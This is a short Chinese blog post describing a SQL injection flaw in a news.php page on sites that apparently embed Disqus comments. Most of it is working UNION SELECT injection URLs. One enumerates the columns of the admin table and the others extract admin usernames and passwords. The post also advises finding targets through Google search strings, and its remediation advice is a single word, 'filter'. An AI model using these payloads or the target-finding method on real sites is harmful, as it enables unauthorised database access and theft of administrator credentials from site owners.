Disqus是世界著名的实时评论系统,如果对其不了解,可以自己Google一下

好吧,其实这漏洞太弱了

其实就是news.php对id值没过滤。看实例吧:

http://www.webshell.cc/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646d696e

 
https://www.webshell.cc/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+name0988b,0x5f,pass0988a),6,7,8+from+admin
测试方法就是:
https://www.webshell.cc/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+name0988b,0x5f,pass0988a),6,7,8+from+admin

Google关键字自己找就好了,
下面有个: blog comments powered by Disqus

修复就是:过滤

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1186.html